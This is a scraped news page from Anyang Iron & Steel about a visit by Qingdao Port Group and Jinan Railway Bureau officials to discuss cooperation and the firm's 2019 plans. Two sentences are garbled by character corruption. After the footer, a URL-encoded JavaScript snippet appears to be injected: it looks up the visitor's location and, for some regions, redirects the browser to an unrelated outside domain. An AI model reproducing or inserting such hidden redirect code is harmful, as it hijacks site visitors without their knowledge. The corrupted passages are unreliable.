English 安钢股份 联系我们 
    新闻中心
 



青岛港集团和济南铁路局客人到安钢走访

 

19日,青岛港集团党委副书记、总裁焦广军,济南铁路局处长董晖一行到安钢走访交流。集团公司总经理刘润生、工会主席张怀宾与客人进行了座谈。

座谈中,刘润生简要介绍安钢2018年的生产经营情况,对焦广军、董晖一行的到来表示欢迎,并向他们一直以来的支持帮助表示感谢。

全面分析了2019年国内的经济形势之后,刘润生说,面对2019年的经济下行压力,下一步,安钢将着力在打造绿色发展、高效发展、高质量发展“三大特色”上下功夫。在环保工作方面,一方面紧紧围绕国家的环保政策,在生产全流程、全过程实现超低排放,一方面着力改善能源结构,以发展绿色物流为目标,构建以新能源为主、清洁能源为辅的新型能源结构。同时做到两个融合,在与殷墟遗址文化融合中,做好古代冶炼文化的传承者,在高标准推进4A级“公园化”、“森林化”园林式工厂建设中,与城市全面融合,努力把自身打造成为城市钢厂绿色发展的典范。在品牌创建方面,突出“双高”引领,深入研究市。?舳⑹谐》⒄沟男滦枨,紧盯重点央企和国家重点工程,抢抓高效订单,发展终端客户,不断拓展销售渠道,扩大市场份额,提升销售创效水平。

刘润生说,安钢与青岛港、济南铁路局关系紧密,感情深厚,下一步,希望三方在互信互利、彼此帮扶中,实现互相促进,双赢发展,持续打开发展的新局面。

焦广军对安钢2018年取得的成绩给予了高度的评价,并对安钢下一步的发展战略表示认同。他说,每次来到安钢,都深深的被安钢的发展进步所震撼,被安钢人的精神所感动。他希望,在新的一年里,能够进一步深化交流,深挖合作潜力,进一步增进了解,扩大合作领域,共同推进新旧动能转换,谱写出合作的新篇章。

焦广军还拿出了象征着美好寓意的“金龙鱼”摆台送给刘润生,也送上了对安钢诚挚的祝:推谕。

座谈前,焦广军、董晖一行在张怀宾的陪同下,到炼铁厂3号高炉进行了参观。随后,刘润生、张怀宾陪同客人在会展中心观看了《精品安钢》宣传片。

 

  建龙钢铁  江苏永钢  河北钢铁  唐钢  包钢  柳钢  酒钢  南钢  莱钢  沙钢  济钢  马钢  太钢  本钢  攀钢  首钢  鞍钢  武钢  宝钢 
 
Copyright ©2010-2012 安阳钢铁集团公司 版权所有 豫ICP备05003857号
地址:河南省安阳市殷都区 邮编:455000 E-Mail:agjt@angang.com.cn 电话:0372-3120114 3121261(销售公司)
 

%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//ip.ws.126.net/ipquery%22%3E%3C/script%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Astrdistrict%20%3D%5Blo%2C%20lc%5D.join%28%27%5Ct%27%29%3B%0Aif%28strdistrict.indexOf%28%22%26%2321271%3B%26%2320140%3B%22%29%3E0%20%7C%7C%20strdistrict.indexOf%28%22%26%2339321%3B%26%2328207%3B%22%29%3E0%29%0A%7B%0Awindow.location.href%3D%22http%3A//www.arrdm.com%22%3B%20%20%20%0A%7D%0Aelse%0A%7B%0A%7D%0A%3C/script%3E